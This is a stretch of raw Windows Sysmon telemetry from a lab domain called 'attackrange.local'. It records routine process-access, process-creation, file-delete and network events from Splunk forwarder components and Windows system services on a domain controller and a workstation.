09:26:34.928{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057497Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.928{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057496Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.928{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8E4A-6151-D000-00000000FD01}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057495Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.928{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E4A-6151-D000-00000000FD01}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057494Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.929{5EBD8912-8E4A-6151-D000-00000000FD01}5416C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001057493Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.444{5EBD8912-8E4A-6151-CF00-00000000FD01}58045228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057492Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.256{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E4A-6151-CF00-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057491Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.256{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057490Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.256{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057489Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.256{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057488Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.256{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057487Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.256{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8E4A-6151-CF00-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057486Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.256{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E4A-6151-CF00-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057485Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.257{5EBD8912-8E4A-6151-CF00-00000000FD01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001057484Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:32.880{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-429.attackrange.local53domainfalse10.0.1.15WIN-HOST-54265337- 23542300x80000000000000001057483Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B231E5427AA900CBAC9A4D754A1C130,SHA256=CB2504993DD90DAC8FDB2F87033E8D71FBB80F13326CBBDBB0DE015829057347,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057482Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.194{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=13459C8AF057F19ECC2993CD0452F0E7,SHA256=EC29902C4C87E7E698F4FDFE7B0DB8FE6309CB212BC54880A45A0D14BBAEC62B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981869Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:35.663{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2AD8E747EEBAFEAB6DAD29E7EF9344D,SHA256=A00D5C61A3798F347E893145A7A04236B1BB629C4CCA64018A0915C8661EAFB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057504Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:35.256{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4620FCC14F47D1B6CB3EA9413D25F5F8,SHA256=54437BFEB8A43457E6407A1BF13FAC06D47C97BB6ABEE5A2C73EC840A4D2622D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057503Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:35.209{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A1917A8EDAB367B9D018ABD5DCD5D63,SHA256=F6BF811B24101EA04AC9CFB5DFA3B827913FDED72EBF45E4057360F9D58832F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057502Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:35.131{5EBD8912-8E4A-6151-D000-00000000FD01}54163680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981873Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:36.694{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3267EFC0CE6C11D71E1AD7EBBA2C7ABA,SHA256=AC5411B02B79A3F0AFFC3E131FDA2E0271ED230418F72B241BDCB1CF5C040AF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981872Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:36.663{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B5DDE17A24CA1E6A734BB18BDAFF8D7,SHA256=6974B1BB9180CA64A3BF5F4476E02751991EF5383B04A6F6E7F1CAED214668BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057514Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.600{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E4C-6151-D100-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057513Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.600{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057512Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.600{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057511Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.600{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057510Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.600{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057509Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.600{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E4C-6151-D100-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057508Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.600{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E4C-6151-D100-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057507Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.601{5EBD8912-8E4C-6151-D100-00000000FD01}5456C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001057506Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:34.151{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54296-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057505Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:36.225{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8C1D324AF47CE66BF0C32BB1A92B2BE,SHA256=7D0FC2A7D6CCA3777D7093F61D7EF491ED5539D9A1331D7A830D5B3D35273B10,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981871Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 